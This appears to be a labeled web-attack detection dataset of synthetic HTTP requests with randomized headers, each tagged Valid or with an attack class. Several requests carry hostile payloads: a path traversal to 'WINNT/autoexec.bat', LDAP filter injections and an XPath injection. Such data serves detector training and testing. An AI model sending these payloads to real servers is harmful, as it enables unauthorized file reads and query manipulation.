GET /onetiidio/RarFoqN45IaK/mP@G.g/i9npCs.vo-ig0LkB7RwD/CWpP.css?Seje7=eeCRtZwzc_X8&zm6=l8Rde-&otryrh3amre=fRjm%29%28%26%28objectClass++%3Dit1*%29 HTTP/1.1
Host: www.juiqI.it:80
Connection: keep-alive
Accept: */*;q=0.5
Accept-Charset: cp-950, iso-2022-jp, us-ascii, x-mac-cyrillic;q=0.1
Accept-Language: a-cHen, thsylga-Alv, Dtualtnl-ueNe;q=0.3, dt4ec-tba;q=0.5, eee-eqr
Date: Wed, 17 Feb 10 04:11:59 CET
ETag: W/"2GEamMx-ggUI9_T@t"
Expect: fnIaiakT
If-Unmodified-Since: Fri, 21 Nov 08 02:51:53 GMT
Max-Forwards: 3
Pragma: grcIoe='pd'
Referer: http://www.oe2or.cz/artbdgrh.doc
TE: trailers,gzip;q=0.2,trailers
Trailer: Connection
User-Agent: fmcetme
Via: HTTP/4.6 237.228.72.177, 2.1 158.140.66.100:3120, HTTP/0.9 59.86.37.247:6

null

End - Id: 38898
Start - Id: 36168
class: PathTransversal
GET /nsfDtitbyibehh60/amaNq/OPABwhere/fEaaa/HRowu9zvie0ahxcv/pTZYB0USgA/rklflssRthnvtts6/jkObmK1ViktJW3oXHeC/2p_.YXccRX5TnR..dll?thEtbHtw=..%2F..%2F..%2F..%2F..%2F..%2FWINNT%2Fautoexec.bat HTTP/1.1
Host: 181.197.135.145
Connection: close
Accept: */*;q=0.5
Accept-Charset: *;q=0.6
Accept-Encoding: deflate;q=0.1, identity, gzip, compress, identity
Accept-Language: *;q=0.7
Cache-Control: 2s4eh=ie
Client-ip: 219.216.59.226
Cookie: ddnqtAhtmauphpa=bt;cyoe1maddtaimr=(h/ealysdeconnect1;rek5r898d=116387;tipoxdtr=conh
Cookie2: $Version="892"
Date: Thu, 24 Sep 09 19:33:03 UTC
ETag: W/"Ur6v1GbQqi5Fpv3B_GUc"
Expect: ojnuth
From: esie@ntoatbni.fr
If-Modified-Since: Sat, 22 Nov 08 19:07:18 UTC
If-Unmodified-Since: Sat, 27 Dec 08 13:05:03 CET
If-Match: "Ga7mUDlwtBviTIW-Q"
If-None-Match: *
If-Range: *
Max-Forwards: 16
Pragma: teteoR7b='ieeRBnn'
Proxy-Authorization: Digest nonce
Authorization: Digest nc=b5e6dAC4
Range: 883-12,6163-,33622-
Referer: /lnlocdOs/tea6Es/2ndAl/nls8nnz.msf
TE: trailers
Trailer: Pragma
User-Agent: eilac (i5943Z)
UA-Disp: 4206,422,32
UA-Color: color32
UA-Pixels: 5546x388
Via: 7.8 27.46.195.168, 8.8 10.97.140.165, 1.0 127.166.226.111
Transfer-Encoding: compress
Upgrade: sBc8h/5.5, Lnio/4.6, olj9p/0.5
Warning: 176 103.233.4.139 "gothscr7a4n" 
X-Forwarded-For: 20.91.96.80
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36168
Start - Id: 34213
class: Valid
POST /okt3lkHJG5mpZXffVk@/BuPa6aFeeRVW.asp? HTTP/1.0
Content-Length: 160
Content-Language: larl
Content-Encoding: gzip
Content-Location: /E4ep/wtaehbin/jcUeh/fsEwdhu/Fsdda.cgi
Content-MD5: Y2F4Y1RzdE9Nb2FUYWRzaQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 11 Dec 04 02:23:25 UTC
Last-Modified: Fri, 26 Aug 05 08:14:23 CET
Host: 7.41.205.125
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.9
Accept-Language: arg-oionft, eOsUy-xMh85cnr, stAesN5-m0sAazc
Cache-Control: no-cache
Client-ip: 2.129.247.203
Cookie: slwq=389883451;vsolamahE=464261;ozmoelAoRurFl=oF1lM0_;hvm8bidd029=l5tpttaoeejrbrtlqn;HQRP_yk=forma
Cookie2: $Version="29"
Date: Sun, 21 May 06 15:57:33 UTC
ETag: "Gg1B1yaE-jhaS2.AN"
Expect: 100-continue
From: tmwyT@acvot.it
If-Modified-Since: Wed, 19 Dec 07 14:44:55 CET
If-Unmodified-Since: Sat, 25 Aug 07 20:06:40 UTC
If-Match: *
If-None-Match: "uViJnrTtQsyw908"
If-Range: *
Max-Forwards: 4714
MIME-Version: 8.9
Pragma: no-cache
Proxy-Authorization: Digest qop=auth
Authorization: Digest qop=tetfk
Range: -4
Referer: http://lihomenb.st/xhiaea/epse/srae3o.swf
TE: deflate;q=0.0,gzip;q=0.4,trailers
Trailer: Transfer-Encoding
User-Agent: lxifaps4 (nB.I7IF5)
UA-CPU: x86
UA-Disp: 0359,9461,8
UA-OS: Win95
UA-Color: color32
UA-Pixels: 306x913
Via: dysNa/3.3 12.111.166.179, 9.7 213.10.30.241
Transfer-Encoding: identity
Upgrade: ey6gg/6.4, mid/9.0, tq0u/3.6, tt7tio/5.3, foheo/4.7
Warning: 658 86.246.59.59 "tuixeqnh6RE1" "Wed, 13 Sep 06 03:28:45 CET"
X-Forwarded-For: 81.117.172.20
X-Serial-Number: 7747668675736673
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

mNiyrdh=oVI8lcZwxi.e&3f2eoZytumeditl=69459806&metaJYLK=xolilhe&tatu8uuwi=tvai49nydire&hdhueYTdelor=Ro&en=jenzeofA&aitB4iycufle8pu=r37S.2KPT38S&te=334&sYnH7=gXV1

End - Id: 34213
Start - Id: 33274
class: Valid
POST /opTkrneUse/ttoche82hoEsu/dG8mYTa8F/cC6Kkztnm/ccLtQ8fC7hRmx5p.jpg? HTTP/1.0
Content-Length: 35
Content-Language: 7eGn,ee1e
Content-Encoding: gzip
Content-Location: http://swwato.org/ceoeitet.tiff
Content-MD5: M2dzbmxsaDU1MmFMYXRscw==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 16 Jan 08 03:50:25 CET
Last-Modified: Fri, 13 Jan 06 15:08:49 GMT
Host: www.eufg.net:80
Connection: keep-alive
Accept: audio/*;q=0.7, text/*;q=0.1
Accept-Charset: *
Accept-Encoding: compress, deflate;q=0.4, identity;q=0.1, identity;q=0.4, deflate
Accept-Language: *;q=0.3
Cache-Control: no-transform
Client-ip: 219.125.100.19
Cookie: qiUy0g=589;isnid=351281084;heedhsrai=lmwjX
Cookie2: $Version="0"
Date: Wed, 26 Jul 06 09:32:58 UTC
ETag: "SWjPbF@p731V.lx@r"
Expect: p6edtsal=nehylgeb
From: oeunn0@celeoof.com
If-Modified-Since: Wed, 16 Mar 05 07:36:52 UTC
If-Unmodified-Since: Wed, 23 Nov 05 09:47:15 UTC
If-Match: *
If-None-Match: "rmBPywd-9nDsRqWZDzQM"
If-Range: Mon, 21 Jan 08 06:42:31 CET
Max-Forwards: 48
MIME-Version: 2.7
Pragma: sti=alHf
Proxy-Authorization: 2o8P wnoasn=nssdM
Authorization: celau lAbhqyw=ndti
Range: -70552,874-,-4
Referer: /erte1hv/sLuvo4/noescch.sh
TE: gzip
Trailer: Pragma
User-Agent: Mozilla/0.1 (Windows; U; Win98 6.7; ew-ns; rv:0.2.9) Gecko/78044266
UA-CPU: x86
UA-Disp: 088,074,32
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 8624x050
Via: 7.5 www.yodsion.shtml, earn/9.0 www.tr2or.jpeg, 8.8 114.64.134.22
Transfer-Encoding: compress
Upgrade: olEewx/5.1
Warning: 468 www.drwecnt.tiff "1etsssicUtAlqrT" 
X-Forwarded-For: 220.33.220.61
X-Serial-Number: 09187614917730
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

mO0Yt=hx:aiyp qe<whn\miobject

End - Id: 33274
Start - Id: 38349
class: LdapInjection
GET /eHfj.PnIOMQwXo8EX6-w/mnbjee1T/ehoeawdss9b/dKZD.UJg@YRXi/uRcnV_mRc13BYI/nJgra5Ut/hOtdutheeln8sr/oknpnxTxEd7crogFZk/optDQa0p/t1rttillsronclom/keiAhvwtski5d.htm?ossmS1nrcOmdlb=48&bslFnaeaeMhur=havingust&mpiignbutda=%40T%40+9SCwak%24mre%27tpe&hopRsY2wr=nad+&2Kdqar=91%29%28%26%28objectClass%3DnCr%29%28%7C%28sn+%3D+++lhi%29%28cn%3De++J*%29%29&feoastoaS=3jspuc9u&upohCxvalmnu=486301&Euieo=d&qoWPEe@nA@H8=55&rvaoodh8ILnt=556&etfimnOzhmtZA=1438256554&he=ps2r0sdtLjaatn HTTP/1.1
Host: www.rts5Sh.net
Connection: keep-alive
Accept: */*;q=0.7
Accept-Charset: *;q=0.7
Accept-Encoding: 
Accept-Language: stwe-osyibe;q=0.9, emEme-yjs, Jee-i
Cache-Control: max-stale=0225
Client-ip: 126.43.137.208
Cookie: enrentgr=89;e0rt3ayh=9n;eoynnsheeuer=ned9qlArsl
Cookie2: $Version="458"
Date: Thu, 20 Mar 08 16:09:55 GMT
ETag: "eg_Owd@DHvhvOHK"
Expect: 100-continue
From: lettnc@jm5ef.cz
If-Modified-Since: Fri, 13 Aug 04 09:31:29 GMT
If-Unmodified-Since: Thu, 10 May 07 13:21:02 GMT
If-Match: *
If-None-Match: "JLvvXg31@D1chy3u_y"
If-Range: "PYr5O0unHSO.RNNxepl"
Max-Forwards: 2023
MIME-Version: 0.6
Pragma: GtwG=ai3hxIs
Proxy-Authorization: Basic bGlXaXJmYTpTcmFl
Authorization: NTLM ZWVob0VsaHJlQ3JydGVhdW9hbXJpZWlzdHR1OWVzZWFvaW9jZWVlcmNlZmRvbm4=
Range: 0-190754,-136
Referer: http://uydOlO.de/itpapt7t/eeeemnaI.mspx
TE: trailers
Trailer: Accept-Encoding
User-Agent: d4slel1ap0 (ebPTtT-1c; e1HrFhS; aMHgmBQf; dJsHkhq)
UA-CPU: 68000
UA-Disp: 854,896,8
UA-OS: Win95
UA-Color: color8
UA-Pixels: 896x746
Via: 3.1 144.79.201.13, uim/1.5 www.essxe2ee.gif:270, 8.5 31.0.116.14
Transfer-Encoding: identity
Upgrade: Mso/2.1, 5stNn/1.9, etusna/2.9, fettee/0.9, 7agirn/3.3
Warning: 566 www.yfryp.tiff "ewpadovcn" 
X-Forwarded-For: 176.194.226.79
X-Serial-Number: 9579642646846
----: -------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 38349
Start - Id: 35643
class: XPathInjection
GET /iqRttfsteyo.css?CVkKgroup byJOO3F=7ema&eynJ3woenlrlbz=hn60HG1xd5I&6ae=p%3F%5D&s3wdQhiai=e5tioteinh&joauaetne=%28i+++++%3C++++count%28ceB2ms%2Fchild%3A%3Atext%28%29%29+and+++++j+++%3C+++++count%28ledeuB%2Fchild%3A%3Acomment%28%29%29+++++and+k+++%3C+++count%28r3a6%2Fchild%3A%3A*%29+++++%29&etCm8l3eLlrnp=ianodil&imbss7=aauE5tginrhloola&nwgetb4BU=5574754011 HTTP/1.1
Host: www.ntOrdo.st
Connection: keep-alive
Accept: */*;q=0.4
Accept-Charset: *
Accept-Encoding: *
Accept-Language: t4Ob-ntpo, einws-oe
Cache-Control: no-cache
Client-ip: 69.177.219.175
Cookie: 2eaW9twdsnAhis=3c_kF8zyWBW;9etnt1a=tmTichOj6 yt>3in ;wnn08xnvumnfH=56760895;ev5Esbhg1tNeh=00;shvoHibnf=eahzgkabNr6ebifohe
Cookie2: $Version="5"
Date: Sun, 22 May 05 22:44:09 CET
ETag: W/"Dmc0He.QKJrzUADJY@sw"
Expect: 100-continue
From: esirPUo@ltaa.cz
If-Modified-Since: Mon, 12 Sep 05 21:13:01 CET
If-Unmodified-Since: Mon, 26 Apr 04 05:59:25 GMT
If-Match: *
If-None-Match: "jyXh9uV8U_znHt9idY"
If-Range: "zkWc-tc057oKfpcTNgq"
Max-Forwards: 656
MIME-Version: 3.8
Pragma: mlmoe=lne
Proxy-Authorization: Digest opaque="snOLwi"
Authorization: Digest username="Uharo1"
Range: -38,162-85,-031
Referer: /supot8ht/w7ifnh/h1attj/vuv5po.msf
TE: gzip,gzip,gzip;q=0.3
Trailer: Range
User-Agent: 1LBbLkD@h http://www.peusItbc.ch
UA-CPU: StrongARM
UA-Disp: 458,730,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 3327x2128
Via: FTP/0.5 97.30.225.2, 6.5 172.11.158.37, ensI/7.8 133.101.159.92:50980
Transfer-Encoding: deflate
Upgrade: e1e/4.3, eSaj/4.1, rweui/7.2
Warning: 083 51.53.107.61:3990 "ittpbttTz" "Fri, 23 May 08 24:15:13 GMT"
X-Forwarded-For: 246.53.246.66
X-Serial-Number: 587545
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35643
Start - Id: 3211
class: Valid
GET /6AiinocDojrOattodam/ebruaSesTi/5Lqh/mV@DdVeN/KyM/9op/wN5dwk.snH3jk7yV4zSl.gif?rhsre=seE%7C&eoTE=9euewtreprnre5&htnetlge9anons=iacxp0ntlr&hvnsthterew1=49174275&STAbra=-nEa%2Fih&Iceep5z=o5%2B%2Baa%3Aeninsert&hltoahosoponil=se6xdttsc&nYt=rTcAV HTTP/1.0
Host: www.1ehiDcrez.it
Connection: dnjs
Accept: image/*, audio/x-wav;q=0.7
Accept-Charset: x-mac-korean, us-ascii, x-mac-ce, x-mac-chinesesimp
Accept-Encoding: deflate, gzip, deflate;q=0.7, compress;q=0.1
Accept-Language: *;q=0.6
Cache-Control: min-fresh=0792
Client-ip: 168.155.88.79
Cookie: cZN@=53;ihso2sar=i46N;eurranw7wlcr=oIeethswootwiw;OexoeAs=edwfhl;YzYjxRZHw=185090087;kqan4ine=25geia
Cookie2: $Version="5"
Date: Fri, 30 Jul 04 12:09:37 GMT
ETag: "h_ZpFUxEf09uSjp9-uq"
Expect: 100-continue
From: asano6tc@asob.it
If-Modified-Since: Tue, 10 Jul 07 08:59:44 GMT
If-Unmodified-Since: Thu, 07 Feb 08 18:01:24 CET
If-Match: *
If-None-Match: "TOa0vLHyvFMPVYDq"
If-Range: *
Max-Forwards: 968
MIME-Version: 3.1
Pragma: no-cache
Proxy-Authorization: NTLM amlhbnBCSGc3YWFuQWVlYUhlYW82aHV0dTQyY2ZvcmhFZWVkaA==
Authorization: carne 3aegisw=UnrOeea
Range: -09285
Referer: http://csdeoye.fr/hsotpenw/rIgper/sp7edi/IcYd1h/n5oatn.ace
TE: trailers
Trailer: Cache-Control
User-Agent: sBBVeQKv http://www.stto.be
UA-CPU: MIPS
UA-Disp: 531,159,8
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 5712x8255
Via: FTP/5.3 96.15.187.155:0614, 5.7 www.b6Ubga.tiff, 3.5 www.8atinE5j.js
Transfer-Encoding: compress
Upgrade: ehtr/8.3
Warning: 768 www.smdc5B.jpg:09194 "irt4rsn3aoytisotr5l" "Mon, 24 May 04 05:31:39 GMT"
X-Forwarded-For: 252.218.6.87
X-Serial-Number: 8986930921
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 3211
Start - Id: 18570
class: Valid
GET /BP/rBnTO/btkCioi7ttn5iauosnn/t-1E@VAejnl5MKkLjI5/ssptIaefS1diy/etirburf3awzXe9/ZJkAj6services/teS2Ut/hfhotdaCSs/ar1ee91hQ/rR3/eomZghFPvT-VjmY4.css?Hiframebgsound.AD4=oosjraUcinE%3C&nnwaetpip6cca=476664223&G54V.pLh=030788&ueaz=aeh&agqhhmhdtAimkie=eW6TB.&naa7o=nSQtwO&2dVZR=vE%26libI&we=snec&ich8ttn=6127388&agdd=597&he1upAetreisnt=%40%3Artrore+Lws&ieIettfr1Tu6=t9P&m5htia8ert=3836&3Xp0EKXpositionHM=d6SsOxuY&iq7Di0yzT=ln1s2htpasseEwfbbconnectmwdservicesYs HTTP/1.1
Host: 124.111.187.161:31
Connection: close
Accept: */*
Accept-Charset: utf-8
Accept-Encoding: *;q=0.9
Accept-Language: *;q=0.5
Cache-Control: n=r
Client-ip: 63.42.65.97
Cookie: naeeeses=:r;psIpasswdkESAdA=oU-1oW0l
Cookie2: $Version="394"
Date: Wed, 17 Mar 10 22:05:46 CET
ETag: "seZrZcY201BJTWfCzn"
Expect: 100-continue
From: tyie@t8hupt4y.biz
If-Modified-Since: Thu, 22 Feb 07 10:52:44 UTC
If-Unmodified-Since: Sun, 29 Jul 07 18:12:51 CET
If-Match: *
If-None-Match: "SDiPiTeA8W.jW7Nk"
If-Range: Mon, 18 Oct 04 11:24:09 GMT
Max-Forwards: 9927
MIME-Version: 3.4
Pragma: no-cache
Proxy-Authorization: Digest qop=mb3ea
Authorization: Digest cnonce="cflsnfi"
Range: -49105,7-,-99029
Referer: http://www.s6eenat.cz/8qbaorf3/rni4hs/eTFh/celsde/u2ehtdt.exe
TE: trailers,gzip
Trailer: Upgrade
User-Agent: Mozilla/3.9 (X11; U; Open BSD i386 6.0; xa-jy; rv:5.9.7) Gecko/44968483
UA-CPU: x86
UA-Disp: 973,9699,32
UA-OS: Win98
UA-Color: color16
UA-Pixels: 924x1764
Via: FTP/2.9 www.lhea.css, 8.2 16.163.176.4, HTTP/8.4 246.14.179.60
Transfer-Encoding: asfeii
Upgrade: nwhsoz/5.6, ahe/8.5
Warning: 614 161.115.13.64 "herotd8lhErudyjden" "Sun, 22 Jul 07 15:37:39 GMT"
X-Forwarded-For: 81.60.123.231
X-Serial-Number: 507234397267768
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 18570
Start - Id: 34708
class: Valid
POST /nYEozNEpI/e9F4/eodeonThmataewhdnU7/tjsomt/6E0vS/6scang3QdUeR.jpeg? HTTP/1.1
Content-Length: 204
Content-Language: ecletNEs,bvtmh,r
Content-Encoding: deflate
Content-Location: http://www.0ob2.org/her2i9.htm
Content-MD5: MzFwZmVuYml0SDJycmVtdg==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 23 Sep 06 17:03:41 CET
Last-Modified: Thu, 23 Dec 04 24:52:23 UTC
Host: 153.58.57.218:80
Connection: keep-alive
Accept: */*;q=0.4
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.7
Cache-Control: only-if-cached
Client-ip: 51.127.174.180
Cookie: hhodunvi2=iXf.xNPkLDrj;t6sTsva=hhup4)ihavingapyi4si s1;enN4E=wueresltc5g;riritgdtmos=tne;window.openetcZoz4include9g9Pa=teotust3tq;E1ir=702
Cookie2: $Version="0"
Date: Sat, 07 Jul 07 06:22:15 UTC
ETag: W/"FiuRvdyZslFb3tqOsaF"
Expect: 100-continue
From: eegGaa@nxna0n.uk
If-Modified-Since: Sat, 14 Oct 06 22:09:30 GMT
If-Unmodified-Since: Tue, 28 Sep 04 15:45:21 GMT
If-Match: "6QN0@BzS-Wbadh4xZ"
If-None-Match: "pd2lnoqdJQkYOfej7q"
If-Range: "p6AWRRetEsxmT9KNLwI"
Max-Forwards: 99
MIME-Version: 5.1
Pragma: hel=n4xlEoNe
Proxy-Authorization: Digest realm
Authorization: nwiEq7 dIwbe=oeeeai
Range: 27601-82680,576792-311040,-975285
Referer: http://tgtqiw.cz/t5tt6hfh/KodssdRE/s1tLe.asmx
TE: gzip,trailers,chunked;q=0.0
Trailer: Cache-Control
User-Agent: emiNyxndoztB
UA-CPU: Sparc
UA-Disp: 659,9099,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 163x0175
Via: 3.8 67.125.137.55, 8oeiV/5.9 69.128.56.99, 9.1 www.tohhPici.tiff
Transfer-Encoding: identity
Upgrade: nq8o/9.4, hsea/1.7
Warning: 385 10.222.142.109:943 "a8tswatndeopoi" "Sat, 28 Jun 08 07:56:55 CET"
X-Forwarded-For: 102.210.121.17
X-Serial-Number: 4224669367104
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

ae=sY1RXf&Son7eenIxd6=422&iSAt=71351814&Ueooo=uf&fdlaorgh=33&iUpeH4aT86=abrt@&rlPhq=2439200&eKmf2neau=alqofromUht;le&ut=thT&uTadauDk=nts&0jraemlkugoxfem=sontnvGtheai&-P87qVyWv=e9belela8oto&gey=iM-JvWV

End - Id: 34708
Start - Id: 28103
class: Valid
GET /jaePdtNel/nBpYs5l7l.8hmL0EIwyt/7trcrhOao38duqAgmo7/u-.Ik6._d/ayxMM7dC@wP4Wd7Mnu.png?E6aNam5nutsannd=a4u%7C2&hOecsence=hzan%25ftprNoe&dFko=uIlEs+t%5Ci1af&trshrthhr=%26d&uehwite=645 HTTP/1.0
Host: www.ftnAosn4.net
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: compress;q=0.3, gzip, identity
Accept-Language: ctoirtea-H, rshyuhe-o;q=0.3, svrjne-smn7m
Cache-Control: no-store
Client-ip: 167.228.251.218
Cookie: hsr=2650680;acmstyle6XLDTo=88800762
Cookie2: $Version="6"
Date: Sat, 16 Feb 08 20:14:33 CET
ETag: W/"XUfnP3E3zKGKY_kZ_"
Expect: 100-continue
From: pnlav3j@ifnra.biz
If-Modified-Since: Wed, 03 Mar 10 15:43:18 CET
If-Unmodified-Since: Fri, 23 Jul 04 10:12:36 CET
If-Match: "b64DTL3SoBu-ADuqEfD9"
If-None-Match: *
If-Range: "T529kDAYygjAvRvMb9"
Max-Forwards: 59
MIME-Version: 2.1
Pragma: no-cache
Proxy-Authorization: NTLM c2huT3NveW4xN2lnNm5yeW9qbDR0ZmV1QUhvcmxhZXR0b21hZA==
Authorization: Digest cnonce="nita0s6"
Range: 432781-
Referer: http://www.hdod.st/oarheUet.zip
TE: chunked;q=0.8,trailers,trailers
Trailer: Connection
User-Agent: Mozilla/7.9 (Windows; U; WinNT 7.0; ri-oo; rv:3.1.4) Gecko/87611619
UA-CPU: MIPS
UA-Disp: 166,4722,8
UA-OS: Win98
UA-Color: color32
UA-Pixels: 4261x691
Via: HTTP/1.0 54.253.58.23, 8.7 186.82.248.119
Transfer-Encoding: gzip
Upgrade: bdNih/1.1, xdHnh/3.6, htee/4.4, 6mIer/6.0
Warning: 810 www.cq0i.htm "twdSte9atJriluetrna" 
X-Forwarded-For: 184.51.223.21
X-Serial-Number: 00220093101680020421
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 28103
Start - Id: 18325
class: Valid
GET /1Bncaccept2%ui/0zIBaHBkHcD-Dqq.1/YwoLjtNV7hO@tL2/oNc6cg/tofbyeHtrTrwir/alaicOyonr/srqn8el9eyyaiac/mzv.php?hrasyxgstt=6_wr&xkuKKtcatUvhk=edQZ65bvJZ&oew7ete=emh5ga&ntrhpiesoa90=r%3F1jibo72pR&R7ehi=lt4ghUe0&tuwri6or1h=aoaf%3F&htreteta=068213189&boto9A7osls=2020&Vkysl.et70Pi=8786954&qHnneaadcertka=twe3&LXMJi-=56 HTTP/1.1
Host: 231.215.58.90
Connection: keep-alive
Accept: text/*, video/mpeg
Accept-Charset: *;q=0.0
Accept-Encoding: 
Accept-Language: *;q=0.5
Cache-Control: only-if-cached
Client-ip: 189.36.206.46
Cookie: Gt6rstcNre=t
Cookie2: $Version="4"
Date: Tue, 13 Nov 07 18:14:26 GMT
ETag: "mRukCI5ousBrTlHc"
Expect: 4ral
From: fjaa@ee0iarrw.cz
If-Modified-Since: Sun, 20 Nov 05 19:12:24 GMT
If-Unmodified-Since: Wed, 03 May 06 07:42:49 GMT
If-Match: *
If-None-Match: "HWaRmc_C1hZuiO4"
If-Range: Sat, 12 Jun 04 18:51:48 GMT
Max-Forwards: 8269
MIME-Version: 5.8
Pragma: utaooi='t46'
Proxy-Authorization: Basic dHZ0dGpSOm9vblJjclM=
Authorization: Digest algorithm=MD5-sess
Range: 33-392,-2077,7-8592
Referer: http://fka1d9g.gov/m1mweit.jsp
TE: trailers,trailers
Trailer: Authorization
User-Agent: oiEbTfyppc0sowbre
UA-CPU: PowerPC
UA-Disp: 468,375,32
UA-OS: Win98
UA-Color: color32
UA-Pixels: 0744x394
Via: 8.7 www.arvsre.htm:49
Transfer-Encoding: gzip
Upgrade: geO/3.5
Warning: 253 24.0.106.147 "r6nyEsuNdiuaaAlcTsi" "Sat, 27 Mar 04 01:27:38 CET"
X-Forwarded-For: 169.14.254.38
X-Serial-Number: 9058000635056383380
----: ------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 18325
Start - Id: 4734
class: Valid
PUT /sjhU.exe? HTTP/1.0
Content-Length: 200
Content-Language: i3
Content-Encoding: compress
Content-Location: http://www.eihldo7.com/lgihhA/echunZp/dhsz.htm
Content-MD5: cHd1bkF0aWhtaDh0OW5tNA==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 08 Sep 04 08:33:57 GMT
Last-Modified: Sat, 19 May 07 05:00:53 GMT
Host: www.0rwvg2dm.st:80
Connection: meorleht
Accept: video/quicktime;q=0.6, application/x-tar;q=0.8, audio/basic
Accept-Charset: euc-cn, big5, windows-874
Accept-Encoding: 
Accept-Language: Rogn4i-vf1ifeQ;q=0.2, Uimlc-3taehre
Cache-Control: no-store
Client-ip: 74.45.236.167
Cookie: ipgCc8=tahaafr8nefo;saigito=shtacces
Cookie2: $Version="320"
Date: Wed, 15 Dec 04 23:31:03 UTC
ETag: "OTgook5dwEyJEDOEqp"
Expect: 100-continue
From: potNyp8h@nruv.uk
If-Modified-Since: Sat, 10 Apr 10 18:00:16 GMT
If-Unmodified-Since: Thu, 20 Dec 07 06:55:05 GMT
If-Match: "THz47sTh4qHfQeLpaR2"
If-None-Match: *
If-Range: "7lmGT7JcH.Q3v4YeEq"
Max-Forwards: 3
MIME-Version: 6.2
Pragma: no-cache
Proxy-Authorization: NTLM NmdycnBldm9hb3Z6Yml1bU00aWxjZWRzcmFyZGVlbGVFZXJ0YUN0Y2NlUXNu
Authorization: Digest nc=09D20E91
Range: -31108
Referer: /tere/bea2hwr/oqepbalo/kuaf/oadPo.jpeg
TE: gzip
Trailer: Transfer-Encoding
User-Agent: nbmbMuG9AB http://www.sTigpo13.org
UA-CPU: MIPS
UA-Disp: 8346,6633,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 4366x138
Via: HTTP/3.0 www.etynoet4.jpg, HTTP/3.4 www.oowonoe.png, 3.0 100.236.46.238
Transfer-Encoding: deflate
Upgrade: gto1/9.1, noos/2.9, su2trm/7.6, u0Ntk/3.5
Warning: 956 24.210.177.89 "qt9hoeeRnsan5aor" "Sat, 30 Sep 06 12:08:47 GMT"
X-Forwarded-For: 247.63.27.49
X-Serial-Number: 64993875
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

lhnrw0azvi=23169&GErcpBjYS=78887146&zia=AateeoeEpatmaTeoJ&Gmeta-IL=dcj1oxdtdreec4&nfe5sra=7422421748&fyotiane=iFcvBD_OM1&a9huqe0wc=sp&saeN=oYwThE.um&ena=3anetcati&owitaLtTsairu=18&ExL3ouK=minioioztgcu

End - Id: 4734
Start - Id: 20358
class: Valid
GET /otuatffCnin/1l_WJpr2_n9i9N-qOCCM/e6ocdeEdiaMbiule/efa/jJ/5ow8ohibin9nu/izc/sN.XYMp.6pk55tETFwJd/aHI/iMdho3ihiway3otmw/Nyg.NgAVzQVHH/oLxN8M.D_.aspx?becns=tdE&des=lI HTTP/1.1
Host: www.ghechtgeo7.it:80
Connection: close
Accept: audio/*
Accept-Charset: utf-7;q=0.2, iso-8859-2;q=0.8
Accept-Encoding: *
Accept-Language: jerrwe2-4, 8eti-rbe, ghr-oasef7tt;q=0.7, nzb-ene;q=0.3
Cache-Control: no-cache
Client-ip: 218.163.0.237
Cookie: sdsTekscr=m1b(;o3csllptcwRp=to7gPN3YN;s4zreo8thytaag=20;rbnbuEoe=saIa0eg2zsl;et5ditaArTdN=ospoeexec
Cookie2: $Version="534"
Date: Sat, 12 Dec 09 19:00:44 CET
ETag: "EbDDSObU4FSkUAKQ5"
Expect: tlcwa=feIgopp;atapesa
From: ikwvhdpm@siorbj.uk
If-Modified-Since: Tue, 08 Jun 04 01:37:01 CET
If-Unmodified-Since: Wed, 16 Feb 05 07:11:38 UTC
If-Match: "WrPTMIni1X0qSb."
If-None-Match: "7H2LUn5RgkghCIze"
If-Range: Wed, 03 Dec 08 06:13:06 GMT
Max-Forwards: 6
MIME-Version: 0.0
Pragma: no-cache
Proxy-Authorization: Basic bzJlZW50ZXA6dHdpYWU=
Authorization: Basic cmZvZTppanZl
Range: -6349,-64
Referer: /rojmti.gz
TE: gzip
Trailer: Trailer
User-Agent: jnolAiette/4.8
UA-CPU: StrongARM
UA-Disp: 139,156,16
UA-OS: Win95
UA-Color: color32
UA-Pixels: 056x355
Via: FTP/8.2 www.tgfp.gif, HTTP/2.0 www.2tEni.html, 0.6 www.tedr.jpeg
Transfer-Encoding: em6res
Upgrade: tsmncn/9.3, skS/8.7, fv3ne/2.7
Warning: 417 www.fynjteI.jpg "ghs2Gimymbhauoku" "Tue, 02 Oct 07 18:48:29 CET"
X-Forwarded-For: 240.25.195.20
X-Serial-Number: 11331311370992169456
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 20358
Start - Id: 70
class: Valid
GET /6oLR/aBYEl/lZv58dOlyj/5HJ.Ztmp@7i6I%umform/tealet1rn/wNG/cquCA/rcpp3yHG8/kR0VLbEV1.exe?eo=eS%40dZBR3&g1eptet9sszr2td=4 HTTP/1.0
Host: www.nednSo.org:80
Connection: keep-alive
Accept: */*;q=0.7
Accept-Charset: x-mac-arabic
Accept-Encoding: deflate;q=0.7, deflate;q=0.4
Accept-Language: k5siW-o
Cache-Control: max-age=72384
Client-ip: 2.252.143.150
Cookie: yfem=hen;oojn=31413
Cookie2: $Version="646"
Date: Tue, 08 May 07 09:53:50 CET
